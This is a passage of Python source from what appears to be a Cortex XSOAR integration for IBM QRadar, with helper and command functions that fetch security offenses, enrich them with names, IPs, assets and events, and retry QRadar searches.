Args:
outputs (List[Dict]): List of the outputs to be sanitized.
key_replace_dict (Dict): Dict of the keys to transform their names.
Returns:
(List[Dict]): Sanitized outputs.
"""
if not isinstance(outputs, list):
outputs = [outputs]
outputs = [remove_empty_elements(output) for output in outputs]
outputs = add_iso_entries_to_dict(outputs)
return build_final_outputs(outputs, key_replace_dict) if key_replace_dict else outputs
def get_time_parameter(arg: Union[Optional[str], Optional[int]], iso_format: bool = False, epoch_format: bool = False):
"""
    Parses 'arg' into a timezone-aware datetime object, if 'arg' exists.
    If no time zone is given, the timezone is set to UTC.
    Returns the datetime object created, its ISO format, or its epoch format.
Args:
arg (str): The argument to turn into aware date time.
iso_format (bool): Whether to return date or the parsed format of the date.
epoch_format (bool): Whether to return date or the epoch format of the date.
Returns:
        - (None): If 'arg' is None, returns None.
        - (datetime): If 'arg' exists and 'iso_format' and 'epoch_format' are false, returns the datetime object.
        - (str): If 'arg' exists and 'iso_format' is true, returns the ISO format of the datetime object.
        - (int): If 'arg' exists and 'epoch_format' is true, returns the epoch format of the datetime object.
"""
maybe_unaware_date = arg_to_datetime(arg, is_utc=True)
if not maybe_unaware_date:
return None
aware_time_date = maybe_unaware_date if maybe_unaware_date.tzinfo else UTC_TIMEZONE.localize(
maybe_unaware_date)
if iso_format:
return aware_time_date.isoformat()
if epoch_format:
return int(aware_time_date.timestamp() * 1000)
return aware_time_date
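# --- Illustrative sketch (added for documentation; never executed). ---
# get_time_parameter normalizes user-supplied date strings (and QRadar epoch values) into
# timezone-aware results in one of three shapes. The sample date below is hypothetical.
def _example_time_parameter_outputs():  # pragma: no cover - illustration only, never called
    as_datetime = get_time_parameter('2021-01-01T00:00:00Z')                    # aware datetime in UTC
    as_iso = get_time_parameter('2021-01-01T00:00:00Z', iso_format=True)        # e.g. '2021-01-01T00:00:00+00:00'
    as_epoch = get_time_parameter('2021-01-01T00:00:00Z', epoch_format=True)    # 1609459200000 (epoch milliseconds)
    return as_datetime, as_iso, as_epoch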
def build_final_outputs(outputs: List[Dict], old_new_dict: Dict) -> List[Dict]:
"""
Receives outputs, or a single output, and a dict containing mapping of old key names to new key names.
Returns a list of outputs containing the new names contained in old_new_dict.
Args:
outputs (Dict): Outputs to replace its keys.
old_new_dict (Dict): Old key name mapped to new key name.
Returns:
(Dict): The dictionary with the transformed keys and their values.
"""
return [{old_new_dict.get(k): v for k, v in output.items() if k in old_new_dict} for output in outputs]
def build_headers(first_headers: List[str], all_headers: Set[str]) -> List[str]:
"""
    Receives headers to be shown first in the war room entry, and concatenates all remaining headers after them.
    Args:
        first_headers (List[str]): First headers to be shown in the war room entry.
        all_headers (Set[str]): Set of all of the headers.
Returns:
(List[str]): List of all of the headers, where first_headers are first in the list.
"""
return first_headers + list(set.difference(all_headers, first_headers))
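# --- Illustrative sketch (added for documentation; never executed). ---
# build_final_outputs keeps only the keys present in the mapping and renames them, and
# build_headers pins the preferred column order for the human readable output. The sample
# closing-reason record below is hypothetical.
def _example_output_shaping():  # pragma: no cover - illustration only, never called
    raw = [{'id': 7, 'text': 'False-Positive', 'internal_field': 'dropped'}]
    shaped = build_final_outputs(raw, CLOSING_REASONS_OLD_NEW_MAP)
    # shaped == [{'ID': 7, 'Name': 'False-Positive'}]
    headers = build_headers(['ID', 'Name'], {key for output in shaped for key in output})
    # headers == ['ID', 'Name'] here, with any remaining keys appended after the pinned ones.
    return shaped, headers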
def is_valid_ip(ip: str) -> bool:
try:
ip_address(ip)
return True
except ValueError:
print_debug_msg(f'IP {ip} was found invalid.')
return False
def get_offense_types(client: Client, offenses: List[Dict]) -> Dict:
"""
Receives list of offenses, and performs API call to QRadar service to retrieve the offense type names
matching the offense type IDs of the offenses.
Args:
client (Client): Client to perform the API request to QRadar.
offenses (List[Dict]): List of all of the offenses.
Returns:
(Dict): Dictionary of {offense_type_id: offense_type_name}
"""
try:
offense_types_ids = {offense.get('offense_type') for offense in offenses if offense.get('offense_type') is not None}
if not offense_types_ids:
return dict()
offense_types = client.offense_types(filter_=f'''id in ({','.join(map(str, offense_types_ids))})''',
fields='id,name')
return {offense_type.get('id'): offense_type.get('name') for offense_type in offense_types}
except Exception as e:
demisto.error(f"Encountered an issue while getting offense type: {e}")
return {}
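# --- Illustrative sketch (added for documentation; never executed). ---
# The enrichment helpers in this section share one pattern: collect the IDs referenced by
# the offenses, query the matching endpoint once with an "id in (...)" filter, and build an
# {id: name} lookup. A sketch of the filter string get_offense_types would send for two
# hypothetical offenses:
def _example_offense_type_filter():  # pragma: no cover - illustration only, never called
    offenses = [{'id': 1, 'offense_type': 3}, {'id': 2, 'offense_type': 5}]
    offense_types_ids = {offense.get('offense_type') for offense in offenses}
    filter_ = f'''id in ({','.join(map(str, offense_types_ids))})'''
    # filter_ is e.g. 'id in (3,5)' (set order is not guaranteed), requested with fields='id,name'.
    return filter_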
def get_offense_closing_reasons(client: Client, offenses: List[Dict]) -> Dict:
"""
Receives list of offenses, and performs API call to QRadar service to retrieve the closing reason names
matching the closing reason IDs of the offenses.
Args:
client (Client): Client to perform the API request to QRadar.
offenses (List[Dict]): List of all of the offenses.
Returns:
(Dict): Dictionary of {closing_reason_id: closing_reason_name}
"""
try:
closing_reason_ids = {offense.get('closing_reason_id') for offense in offenses
if offense.get('closing_reason_id') is not None}
if not closing_reason_ids:
return dict()
closing_reasons = client.closing_reasons_list(filter_=f'''id in ({','.join(map(str, closing_reason_ids))})''',
fields='id,text')
return {closing_reason.get('id'): closing_reason.get('text') for closing_reason in closing_reasons}
except Exception as e:
demisto.error(f"Encountered an issue while getting offense closing reasons: {e}")
return {}
def get_domain_names(client: Client, outputs: List[Dict]) -> Dict:
"""
Receives list of outputs, and performs API call to QRadar service to retrieve the domain names
matching the domain IDs of the outputs.
Args:
client (Client): Client to perform the API request to QRadar.
        outputs (List[Dict]): List of the outputs (offenses or assets) to retrieve domain names for.
Returns:
(Dict): Dictionary of {domain_id: domain_name}
"""
try:
domain_ids = {offense.get('domain_id') for offense in outputs if offense.get('domain_id') is not None}
if not domain_ids:
return dict()
domains_info = client.domains_list(filter_=f'''id in ({','.join(map(str, domain_ids))})''', fields='id,name')
return {domain_info.get('id'): domain_info.get('name') for domain_info in domains_info}
except Exception as e:
demisto.error(f"Encountered an issue while getting offense domain names: {e}")
return {}
def get_rules_names(client: Client, offenses: List[Dict]) -> Dict:
"""
Receives list of offenses, and performs API call to QRadar service to retrieve the rules names
matching the rule IDs of the offenses.
Args:
client (Client): Client to perform the API request to QRadar.
offenses (List[Dict]): List of all of the offenses.
Returns:
(Dict): Dictionary of {rule_id: rule_name}
"""
try:
rules_ids = {rule.get('id') for offense in offenses for rule in offense.get('rules', [])}
if not rules_ids:
return dict()
rules = client.rules_list(None, None, f'''id in ({','.join(map(str, rules_ids))})''', 'id,name')
return {rule.get('id'): rule.get('name') for rule in rules}
except Exception as e:
demisto.error(f"Encountered an issue while getting offenses rules: {e}")
return {}
def get_offense_addresses(client: Client, offenses: List[Dict], is_destination_addresses: bool) -> Dict:
"""
    Receives list of offenses, and performs API call to QRadar service to retrieve the source/destination IP values
    matching the source/destination address IDs of the offenses.
Args:
client (Client): Client to perform the API request to QRadar.
offenses (List[Dict]): List of all of the offenses.
is_destination_addresses(bool): Whether addresses to enrich are destination IPs (or source).
Returns:
        (Dict): Dictionary of {address_id: address_value}.
"""
address_type = 'local_destination' if is_destination_addresses else 'source'
address_field = f'{address_type}_ip'
address_list_field = f'{address_type}_address_ids'
url_suffix = f'{address_type}_addresses'
def get_addresses_for_batch(b: List):
try:
return client.get_addresses(url_suffix, f'''id in ({','.join(map(str, b))})''', f'id,{address_field}')
except Exception as e:
            demisto.error(f'Failed getting address batch with error: {e}')
return []
addresses_ids = [address_id for offense in offenses
for address_id in offense.get(address_list_field, [])]
# Submit addresses in batches to avoid overloading QRadar service
addresses_batches = [get_addresses_for_batch(b) for b
in batch(addresses_ids[:OFF_ENRCH_LIMIT], batch_size=int(BATCH_SIZE))]
return {address_data.get('id'): address_data.get(address_field)
for addresses_batch in addresses_batches
for address_data in addresses_batch}
def create_single_asset_for_offense_enrichment(asset: Dict) -> Dict:
"""
    Receives one asset, and returns the expected asset values for enriching the offense.
Args:
asset (Dict): Asset to enrich the offense with
Returns:
(Dict): The enriched asset.
"""
interfaces = {'interfaces': [{
'mac_address': interface.get('mac_address'),
'id': interface.get('id'),
'ip_addresses': [{
'type': ip_add.get('type'),
'value': ip_add.get('value')
} for ip_add in interface.get('ip_addresses', [])]
} for interface in asset.get('interfaces', [])]}
properties = {prop.get('name'): prop.get('value') for prop in asset.get('properties', [])
if 'name' in prop and 'value' in prop}
offense_without_properties = {k: v for k, v in asset.items() if k != 'properties'}
return add_iso_entries_to_asset(dict(offense_without_properties, **properties, **interfaces))
def enrich_offense_with_assets(client: Client, offense_ips: List[str]) -> List[Dict]:
"""
Receives list of offense's IPs, and performs API call to QRadar service to retrieve assets correlated to IPs given.
Args:
client (Client): Client to perform the API request to QRadar.
offense_ips (List[str]): List of all of the offense's IPs.
Returns:
(List[Dict]): List of all the correlated assets.
"""
def get_assets_for_ips_batch(b: List):
filter_query = ' or '.join([f'interfaces contains ip_addresses contains value="{ip}"' for ip in b])
try:
return client.assets_list(filter_=filter_query)
except Exception as e:
demisto.error(f'Failed getting assets for filter_query: {filter_query}. {e}')
return []
offense_ips = [offense_ip for offense_ip in offense_ips if is_valid_ip(offense_ip)]
# Submit addresses in batches to avoid overloading QRadar service
assets = [asset for b in batch(offense_ips[:OFF_ENRCH_LIMIT], batch_size=int(BATCH_SIZE))
for asset in get_assets_for_ips_batch(b)]
return [create_single_asset_for_offense_enrichment(asset) for asset in assets]
def enrich_offenses_result(client: Client, offenses: Any, enrich_ip_addresses: bool,
enrich_assets: bool) -> List[Dict]:
"""
Receives list of offenses, and enriches the offenses with the following:
- Changes offense_type value from the offense type ID to the offense type name.
- Changes closing_reason_id value from closing reason ID to the closing reason name.
- Adds a link to the URL of each offense.
- Adds the domain name of the domain ID for each offense.
- Adds to each rule of the offense its name.
- Adds enrichment to each source/destination IP ID to its address (if enrich_ip_addresses is true).
- Adds enrichment of assets to each offense (if enrich_assets is true).
Args:
client (Client): Client to perform the API calls.
offenses (Any): List of all of the offenses to enrich.
enrich_ip_addresses (bool): Whether to enrich the offense source/destination IP addresses.
enrich_assets (bool): Whether to enrich the offense with assets.
Returns:
(List[Dict]): The enriched offenses.
"""
if not isinstance(offenses, list):
offenses = [offenses]
print_debug_msg('Enriching offenses')
offense_types_id_name_dict = get_offense_types(client, offenses)
closing_reasons_id_name_dict = get_offense_closing_reasons(client, offenses)
domain_id_name_dict = get_domain_names(client, offenses) if DOMAIN_ENRCH_FLG.lower() == 'true' else dict()
rules_id_name_dict = get_rules_names(client, offenses) if RULES_ENRCH_FLG.lower() == 'true' else dict()
source_addresses_id_ip_dict = get_offense_addresses(client, offenses, False) if enrich_ip_addresses else dict()
destination_addresses_id_ip_dict = get_offense_addresses(client, offenses, True) if enrich_ip_addresses else dict()
def create_enriched_offense(offense: Dict) -> Dict:
link_to_offense_suffix = '/console/do/sem/offensesummary?appName=Sem&pageId=OffenseSummary&summaryId' \
f'''={offense.get('id')}'''
offense_type = offense.get('offense_type')
closing_reason_id = offense.get('closing_reason_id')
domain_id = offense.get('domain_id')
basic_enriches = {
'offense_type': offense_types_id_name_dict.get(offense_type, offense_type),
'closing_reason_id': closing_reasons_id_name_dict.get(closing_reason_id, closing_reason_id),
'LinkToOffense': urljoin(client.server, link_to_offense_suffix),
}
domain_enrich = {
'domain_name': domain_id_name_dict.get(domain_id, domain_id)
} if DOMAIN_ENRCH_FLG.lower() == 'true' and domain_id_name_dict.get(domain_id, domain_id) else dict()
rules_enrich = {
'rules': [{
'id': rule.get('id'),
'type': rule.get('type'),
'name': rules_id_name_dict.get(rule.get('id'), rule.get('id'))
} for rule in offense.get('rules', [])] if RULES_ENRCH_FLG.lower() == 'true' else dict()
}
source_addresses_enrich = {
'source_address_ids': [source_addresses_id_ip_dict.get(source_address_id) for source_address_id in
offense.get('source_address_ids', [])]
} if enrich_ip_addresses else dict()
destination_addresses_enrich = {
'local_destination_address_ids': [destination_addresses_id_ip_dict.get(destination_address_id) for
destination_address_id in
offense.get('local_destination_address_ids', [])]
} if enrich_ip_addresses else dict()
if enrich_assets:
source_ips: List = source_addresses_enrich.get('source_address_ids', [])
destination_ips: List = destination_addresses_enrich.get('local_destination_address_ids', [])
all_ips: List = source_ips + destination_ips
asset_enrich = {'assets': enrich_offense_with_assets(client, all_ips)}
else:
asset_enrich = dict()
return dict(offense, **basic_enriches, **domain_enrich, **rules_enrich, **source_addresses_enrich,
**destination_addresses_enrich, **asset_enrich)
result = [create_enriched_offense(offense) for offense in offenses]
print_debug_msg('Enriched offenses successfully.')
return result
def enrich_asset_properties(properties: List, properties_to_enrich_dict: Dict) -> Dict:
"""
Receives list of properties of an asset, and properties to enrich, and returns a dict containing the enrichment
Args:
properties (List): List of properties of an asset.
properties_to_enrich_dict (Dict): Properties to be enriched.
Returns:
        (Dict): Dictionary of the enriched asset properties.
"""
return {
properties_to_enrich_dict.get(prop.get('name')): {
'Value': prop.get('value'),
'LastUser': prop.get('last_reported_by')
} for prop in properties if prop.get('name') in properties_to_enrich_dict
}
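# --- Illustrative sketch (added for documentation; never executed). ---
# enrich_asset_properties turns QRadar's name/value property list into named keys while
# keeping the user that last reported each value. The sample properties below are
# hypothetical.
def _example_asset_property_enrichment():  # pragma: no cover - illustration only, never called
    properties = [
        {'name': 'Unified Name', 'value': 'host-1', 'last_reported_by': 'scanner'},
        {'name': 'Some Other Property', 'value': 'ignored'},
    ]
    enriched = enrich_asset_properties(properties, ASSET_PROPERTIES_NAME_MAP)
    # enriched == {'Name': {'Value': 'host-1', 'LastUser': 'scanner'}}
    return enriched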
def add_iso_entries_to_asset(asset: Dict) -> Dict:
"""
Transforms epoch entries to ISO entries in an asset.
    Requires special treatment, because some of the usec entries are nested.
Args:
asset (Dict): Asset to transform its epoch entries to ISO.
Returns:
(Dict): Asset transformed.
"""
def get_asset_entry(k: str, v: Any):
if k == 'interfaces':
return [{
k: (get_time_parameter(v, iso_format=True) if k in USECS_ENTRIES
else add_iso_entries_to_dict(v) if k == 'ip_addresses' else v)
for k, v in interface.items()
} for interface in v]
elif k == 'properties':
return add_iso_entries_to_dict(v)
elif k in USECS_ENTRIES:
return get_time_parameter(v, iso_format=True)
else:
return v
return {k: get_asset_entry(k, v) for k, v in asset.items()}
def enrich_assets_results(client: Client, assets: Any, full_enrichment: bool) -> List[Dict]:
"""
Receives list of assets, and enriches each asset with 'Endpoint' entry containing the following:
- IP addresses of all interfaces.
- OS name.
- MAC addresses of the interfaces, if full enrichment was requested.
- Domain name if full enrichment was requested.
- Properties enrichment.
Args:
client (Client): Client to perform API call to retrieve domain names corresponding to the domain IDs.
assets (List[Dict]): List of assets to be enriched.
        full_enrichment (bool): Whether the asset should be fully enriched.
Returns:
(List[Dict]) List of new assets with enrichment.
"""
domain_id_name_dict = get_domain_names(client, assets) if full_enrichment else dict()
def enrich_single_asset(asset: Dict) -> Dict:
updated_asset = add_iso_entries_to_asset(asset)
interfaces = updated_asset.get('interfaces', [])
properties = updated_asset.get('properties', [])
domain_id = updated_asset.get('domain_id')
os_name = next((prop.get('value') for prop in properties if prop.get('name') == 'Primary OS ID'), None)
ip_enrichment = {
'IPAddress': [ip_add.get('value') for interface in interfaces
for ip_add in interface.get('ip_addresses', [])
if ip_add.get('value')]
}
os_enrichment = {'OS': os_name} if os_name else dict()
mac_enrichment = {
'MACAddress': [interface.get('mac_address') for interface in interfaces if
interface.get('mac_address')]
} if full_enrichment else dict()
domains_enrichment = {'Domain': domain_id_name_dict.get(domain_id, domain_id)} \
if full_enrichment and domain_id else dict()
basic_properties_enrichment = enrich_asset_properties(properties, ASSET_PROPERTIES_NAME_MAP)
full_properties_enrichment = enrich_asset_properties(properties,
FULL_ASSET_PROPERTIES_NAMES_MAP) \
if full_enrichment else dict()
enriched_asset = dict(asset, **basic_properties_enrichment, **full_properties_enrichment)
return {'Asset': add_iso_entries_to_asset(enriched_asset),
'Endpoint': dict(ip_enrichment, **os_enrichment, **mac_enrichment,
**domains_enrichment)}
return [enrich_single_asset(asset) for asset in assets]
def get_minimum_id_to_fetch(highest_offense_id: int, user_query: Optional[str]) -> int:
"""
Receives the highest offense ID saved from last run, and user query.
Checks if user query has a limitation for a minimum ID.
If such ID exists, returns the maximum between 'highest_offense_id' and the minimum ID
limitation received by the user query.
Args:
        highest_offense_id (int): The highest offense ID fetched in the last run; the next fetch starts above it.
user_query (Optional[str]): User query for QRadar service.
Returns:
(int): The Minimum ID to fetch offenses by.
"""
if user_query:
id_query = ID_QUERY_REGEX.search(user_query)
if id_query:
id_query_raw = id_query.group(0)
operator = '>=' if '>=' in id_query_raw else '>'
# safe to int parse without catch because regex checks for number
user_offense_id = int(id_query.group(0).split(operator)[1].strip())
user_lowest_offense_id = user_offense_id if operator == '>' else user_offense_id - 1
print_debug_msg(f'Found ID in user query: {user_lowest_offense_id}, last highest ID: {highest_offense_id}')
return max(highest_offense_id, user_lowest_offense_id)
return highest_offense_id
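# --- Illustrative sketch (added for documentation; never executed). ---
# get_minimum_id_to_fetch reconciles the highest offense ID stored from the last run with
# an 'id > X' / 'id >= X' clause in the user query, so the next 'id>{minimum}' fetch filter
# never drops below either bound. The IDs and query strings below are hypothetical.
def _example_minimum_id_to_fetch():  # pragma: no cover - illustration only, never called
    assert get_minimum_id_to_fetch(100, 'id > 150 AND status=OPEN') == 150
    assert get_minimum_id_to_fetch(100, 'id >= 150 AND status=OPEN') == 149  # inclusive bound, so 149 keeps 150
    assert get_minimum_id_to_fetch(200, 'id > 150') == 200                   # stored ID already higher
    assert get_minimum_id_to_fetch(200, None) == 200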
def get_offense_enrichment(enrichment: str) -> Tuple[bool, bool]:
"""
Receives enrichment asked by the user, returns true or false values indicating which enrichment should be done.
Args:
enrichment (Optional[str]): Enrichment argument.
Returns:
(bool, bool): Tuple of (ip_enrich, asset_enrich).
"""
if enrichment == 'IPs And Assets':
return True, True
if enrichment == 'IPs':
return True, False
return False, False
def print_debug_msg(msg: str):
"""
Prints a message to debug with QRadarMsg prefix.
Args:
msg (str): Message to be logged.
"""
demisto.debug(f'QRadarMsg - {msg}')
def reset_mirroring_events_variables(mirror_options: str):
"""In case of change in mirror_options initialize mirror with events context data variables.
Args:
mirror_options: The current mirror options
Returns: None
"""
ctx = extract_context_data(get_integration_context().copy())
try:
print_mirror_events_stats(ctx, f"New Long Running Container - Before Mirroring Variables Reset, "
f"Mirror Option {mirror_options}")
except Exception as e:
print_debug_msg(f'Could not print mirror_events_stats due to error: {str(e)} \n '
                        f'Resetting mirroring vars')
mirror_options = 'needs reset to mirroring vars'
if mirror_options != MIRROR_OFFENSE_AND_EVENTS:
ctx[UPDATED_MIRRORED_OFFENSES_CTX_KEY] = []
ctx[MIRRORED_OFFENSES_CTX_KEY] = []
ctx[RESUBMITTED_MIRRORED_OFFENSES_CTX_KEY] = []
print_mirror_events_stats(ctx, "New Long Running Container - After Mirroring Variables Reset")
set_to_integration_context_with_retries(encode_context_data(ctx))
def is_reset_triggered():
"""
    Checks if a reset of the integration context has been requested by the user.
    Because the fetch is a long running execution, the user communicates with us
    by calling the 'qradar-reset-last-run' command, which sets a reset flag in
    the context.
Returns:
(bool):
        - True if the reset flag was set; in that case the integration context is also reset.
- False if reset flag was not found in integration context.
"""
ctx = get_integration_context()
if ctx and RESET_KEY in ctx:
print_debug_msg('Reset fetch-incidents.')
set_integration_context({'samples': '[]'})
return True
return False
def validate_long_running_params(params: Dict) -> None:
"""
    Receives params, checks whether the required parameters for long running execution are configured.
Args:
params (Dict): Cortex XSOAR params.
Returns:
(None): If all required params are set, raises DemistoException otherwise.
"""
for param_field, param_display in LONG_RUNNING_REQUIRED_PARAMS.items():
if param_field not in params:
raise DemistoException(f'Parameter {param_display} is required when enabling long running execution.'
' Please set a value for it.')
''' COMMAND FUNCTIONS '''
def test_module_command(client: Client, params: Dict) -> str:
"""
    Tests API connectivity and authentication.
Returning 'ok' indicates that the integration works like it is supposed to.
Connection to the service is successful.
Raises exceptions if something goes wrong.
Args:
client (Client): Client to perform the API calls.
params (Dict): Demisto params.
Returns:
- (str): 'ok' if test passed
- raises DemistoException if something had failed the test.
"""
try:
ctx = extract_context_data(get_integration_context(), include_id=True)
print_mirror_events_stats(ctx, "Test Module")
is_long_running = params.get('longRunning')
if is_long_running:
validate_long_running_params(params)
ip_enrich, asset_enrich = get_offense_enrichment(params.get('enrichment', 'IPs And Assets'))
# Try to retrieve the last successfully retrieved offense
last_highest_id = max(ctx.get(LAST_FETCH_KEY, 0) - 1, 0)
get_incidents_long_running_execution(
client=client,
offenses_per_fetch=1,
user_query=params.get('query', ''),
fetch_mode=params.get('fetch_mode', ''),
events_columns=params.get('events_columns', ''),
events_limit=0,
ip_enrich=ip_enrich,
asset_enrich=asset_enrich,
last_highest_id=last_highest_id,
incident_type=params.get('incident_type'),
mirror_direction=MIRROR_DIRECTION.get(params.get('mirror_options', DEFAULT_MIRRORING_DIRECTION))
)
else:
client.offenses_list(range_="items=0-0")
message = 'ok'
except DemistoException as e:
err_msg = str(e)
if 'unauthorized to access the requested resource' in err_msg or 'No SEC header present in request' in err_msg:
message = 'Authorization Error: make sure credentials are correct.'
else:
raise e
return message
def fetch_incidents_command() -> List[Dict]:
"""
    Fetch incidents is implemented for mapping purposes only.
Returns list of samples saved by long running execution.
Returns:
(List[Dict]): List of incidents samples.
"""
ctx = get_integration_context()
return extract_context_data(ctx).get('samples', [])
def create_search_with_retry(client: Client, fetch_mode: str, offense: Dict, event_columns: str, events_limit: int,
max_retries: int = EVENTS_FAILURE_LIMIT) -> Optional[Dict]:
"""
Creates a search to retrieve events for an offense.
    Has a retry mechanism, because the QRadar service tends to return random errors when
    it is under load.
    Therefore, 'max_retries' retries will be made, to try to avoid such cases as much as possible.
Args:
client (Client): Client to perform the API calls.
fetch_mode (str): Which enrichment mode was requested.
Can be 'Fetch With All Events', 'Fetch Correlation Events Only'
        offense (Dict): Offense to enrich with events.
event_columns (str): Columns of the events to be extracted from query.
events_limit (int): Maximum number of events to enrich the offense.
max_retries (int): Number of retries.
Returns:
(Dict): If search was created successfully.
None: If reset was triggered or number of retries exceeded limit.
"""
additional_where = ''' AND LOGSOURCETYPENAME(devicetype) = 'Custom Rule Engine' ''' \
if fetch_mode == FetchMode.correlations_events_only.value else ''
# Decrease 1 minute from start_time to avoid the case where the minute queried of start_time equals end_time.
offense_start_time = offense['start_time'] - 60 * 1000
offense_id = offense['id']
query_expression = (
f'SELECT {event_columns} FROM events WHERE INOFFENSE({offense_id}) {additional_where} limit {events_limit} '
f'START {offense_start_time}'
)
print_debug_msg(f'Trying to get events for offense ID: {offense_id}, '
f'offense_start_time: {offense_start_time}, '
f'additional_where: {additional_where}, '
f'events_limit: {events_limit}.')
num_of_failures = 0
while num_of_failures <= max_retries:
try:
print_debug_msg(f'Creating search for offense ID: {offense_id}, '
f'query_expression: {query_expression}.')
ret_value = client.search_create(query_expression=query_expression)
print_debug_msg(f'Created search for offense ID: {offense_id}, '
f'offense_start_time: {offense_start_time}, '
f'additional_where: {additional_where}, '
f'events_limit: {events_limit}, '
f'ret_value: {ret_value}.')
return ret_value
except Exception:
print_debug_msg(f'Failed to create search for offense ID: {offense_id}. '
f'Retry number {num_of_failures}/{max_retries}.')
print_debug_msg(traceback.format_exc())
num_of_failures += 1
if num_of_failures == max_retries:
print_debug_msg(f'Max retries for creating search for offense: {offense_id}. Returning empty.')
break
time.sleep(FAILURE_SLEEP)
print_debug_msg(f'Returning empty events for offense ID: {offense_id}.')
return None
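# --- Illustrative sketch (added for documentation; never executed). ---
# create_search_with_retry builds one AQL query per offense: correlation-only fetch mode
# restricts events to the 'Custom Rule Engine' log source type, and the search window starts
# one minute before the offense start time. The offense, column list and limit below are
# hypothetical.
def _example_events_aql_query():  # pragma: no cover - illustration only, never called
    offense = {'id': 123, 'start_time': 1609459260000}
    events_columns = 'QIDNAME(qid), LOGSOURCENAME(logsourceid), sourceip, destinationip'
    events_limit = 20
    additional_where = ''' AND LOGSOURCETYPENAME(devicetype) = 'Custom Rule Engine' '''
    query_expression = (
        f'SELECT {events_columns} FROM events WHERE INOFFENSE({offense["id"]}) {additional_where} '
        f'limit {events_limit} START {offense["start_time"] - 60 * 1000}'
    )
    # e.g. "SELECT QIDNAME(qid), ... FROM events WHERE INOFFENSE(123)  AND ... limit 20 START 1609459200000"
    return query_expression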
def poll_offense_events_with_retry(client: Client, search_id: str, offense_id: int,
max_retries: int = EVENTS_FAILURE_LIMIT) -> Tuple[List[Dict], str]:
"""
Polls QRadar service for search ID given until status returned is within '{'CANCELED', 'ERROR', 'COMPLETED'}'.
Afterwards, performs a call to retrieve the events returned by the search.
    Has a retry mechanism, because the QRadar service tends to return random errors when
    it is under load.
    Therefore, 'max_retries' retries will be made, to try to avoid such cases as much as possible.
Args:
client (Client): Client to perform the API calls.
search_id (str): ID of the search to poll for its status.
offense_id (int): ID of the offense to enrich with events returned by search. Used for logging purposes here.
max_retries (int): Number of retries.
Returns:
(List[Dict], str): List of events returned by query. Returns empty list if number of retries exceeded limit,
        A failure message in case an error occurred.
"""
num_of_failures = 0
start_time = time.time()
failure_message = ''
while num_of_failures <= max_retries:
try:
print_debug_msg(f"Getting search status for {search_id}")
search_status_response = client.search_status_get(search_id)
print_debug_msg(f"Got search status for {search_id}")
query_status = search_status_response.get('status')
# failures are relevant only when consecutive
num_of_failures = 0
print_debug_msg(f'Search query_status: {query_status}')
# Possible values for query_status: {'CANCELED', 'ERROR', 'COMPLETED'}
            # Don't try to get events if CANCELED or ERROR
if query_status in {'CANCELED', 'ERROR'}:
if failure_message == '':
failure_message = f'query_status is {query_status}'
return [], failure_message
elif query_status == 'COMPLETED':
print_debug_msg(f'Getting events for offense {offense_id}')
search_results_response = client.search_results_get(search_id)
print_debug_msg(f'Http response: {search_results_response.get("http_response", "Not specified - ok")}')
events = search_results_response.get('events', [])
sanitized_events = sanitize_outputs(events)
print_debug_msg(f'Fetched {len(sanitized_events)} events for offense {offense_id}.')
return sanitized_events, failure_message
elapsed = time.time() - start_time
if elapsed >= FETCH_SLEEP: # print status debug every fetch sleep (or after)
print_debug_msg(f'Still fetching offense {offense_id} events, search_id: {search_id}.')
start_time = time.time()
time.sleep(EVENTS_INTERVAL_SECS)
except Exception as e:
print_debug_msg(
f'Error while fetching offense {offense_id} events, search_id: {search_id}. Error details: {str(e)} \n'
f'{traceback.format_exc()}')
num_of_failures += 1
if num_of_failures < max_retries:
time.sleep(FAILURE_SLEEP)
else:
failure_message = f'{repr(e)} \nSee logs for further details.'
print_debug_msg(f'Could not fetch events for offense ID: {offense_id}, returning empty events array.')
return [], failure_message
def enrich_offense_with_events(client: Client, offense: Dict, fetch_mode: str, events_columns: str, events_limit: int,
max_retries: int = MAX_FETCH_EVENT_RETIRES):
"""
Enriches offense given with events.
    Has a retry mechanism for events returned by the query to QRadar. This is needed because events might not be
    indexed yet when performing the search, and QRadar will return fewer events than expected.
    The retry mechanism here is meant to avoid such cases as much as possible.
Args:
client (Client): Client to perform the API calls.
offense (Dict): Offense to enrich with events.
fetch_mode (str): Which enrichment mode was requested.
Can be 'Fetch With All Events', 'Fetch Correlation Events Only'
events_columns (str): Columns of the events to be extracted from query.
events_limit (int): Maximum number of events to enrich the offense.
max_retries (int): Number of retries.
Returns:
(Dict): Enriched offense with events.
"""
failure_message = ''
events: List[dict] = []
min_events_size = min(offense.get('event_count', 0), events_limit)
    # create_search_with_retry decreases 1 minute from the start_time to avoid the case where the minute queried of start_time equals end_time.
for i in range(max_retries):
        # retry to check if we got all the events (it's not an error retry), see docstring
search_response = create_search_with_retry(client, fetch_mode, offense, events_columns,
events_limit)
if not search_response:
continue
offense_id = offense['id']
events, failure_message = poll_offense_events_with_retry(client, search_response['search_id'], offense_id)
print_debug_msg(f"Polled events for offense ID {offense_id}")
if len(events) >= min_events_size:
print_debug_msg(f"Fetched {len(events)}/{min_events_size} for offense ID {offense_id}")
break
print_debug_msg(f'Did not fetch enough events. Expected at least {min_events_size}. Retrying to fetch events '
f'for offense ID: {offense_id}. Retry number {i}/{max_retries}')
if i < max_retries - 1:
time.sleep(SLEEP_FETCH_EVENT_RETIRES)
print_debug_msg(f"Reached max retries for offense {offense.get('id')} with failure message {failure_message}")
if failure_message == '' and len(events) < min_events_size:
failure_message = 'Events were probably not indexed in QRadar at the time of the mirror.'
offense = dict(offense, mirroring_events_message=failure_message)
if events:
offense = dict(offense, events=events)
return offense
def get_incidents_long_running_execution(client: Client, offenses_per_fetch: int, user_query: str, fetch_mode: str,
events_columns: str, events_limit: int, ip_enrich: bool, asset_enrich: bool,
last_highest_id: int, incident_type: Optional[str],
mirror_direction: Optional[str]) -> Tuple[Optional[List[Dict]], Optional[int]]:
"""
Gets offenses from QRadar service, and transforms them to incidents in a long running execution.
Args:
client (Client): Client to perform the API calls.
offenses_per_fetch (int): Maximum number of offenses to be fetched.
user_query (str): If given, the user filters for fetching offenses from QRadar service.
fetch_mode (str): Fetch mode of the offenses.
Can be 'Fetch Without Events', 'Fetch With All Events', 'Fetch Correlation Events Only'
events_columns (str): Events columns to extract by search query for each offense. Only used when fetch mode
is not 'Fetch Without Events'.
events_limit (int): Number of events to be fetched for each offense. Only used when fetch mode is not
'Fetch Without Events'.
ip_enrich (bool): Whether to enrich offense by changing IP IDs of each offense to its IP value.
asset_enrich (bool): Whether to enrich offense with assets
last_highest_id (int): The highest ID of all the offenses that have been fetched from QRadar service.
incident_type (Optional[str]): Incident type.
mirror_direction (Optional[str]): Whether mirror in is activated or not.
Returns:
